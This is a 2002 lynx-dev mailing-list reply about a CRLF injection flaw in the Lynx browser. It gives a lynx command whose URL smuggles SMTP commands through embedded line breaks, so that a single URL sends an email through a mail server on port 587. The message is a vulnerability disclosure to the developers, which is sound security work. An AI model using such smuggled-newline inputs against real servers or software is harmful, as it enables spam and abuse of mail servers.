[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: lynx-dev Lynx CRLF Injection (fwd)
From: |
Ulf H{rnhammar |
Subject: |
Re: lynx-dev Lynx CRLF Injection (fwd) |
Date: |
Wed, 21 Aug 2002 19:57:56 +0200 |
User-agent: |
Mutt/1.3.28i |
It is also possible to use this hole for communication with other types of
servers than HTTP servers:
$ lynx "http://mail.site1.st:587/ HTTP/1.0
HELO mail.site1.st
MAIL FROM: <address@hidden>
RCPT TO: <address@hidden>
DATA
From: address@hidden
To: address@hidden
Subject: This is..
This is an URL that sends an e-mail?
.
QUIT
"
You have to use the alternate port 587, because the normal port 25 is blocked.
The MTA will complain about the "GET / HTTP/1.0" string, but it still works.
// Ulf Harnhammar
; To UNSUBSCRIBE: Send "unsubscribe lynx-dev" to address@hidden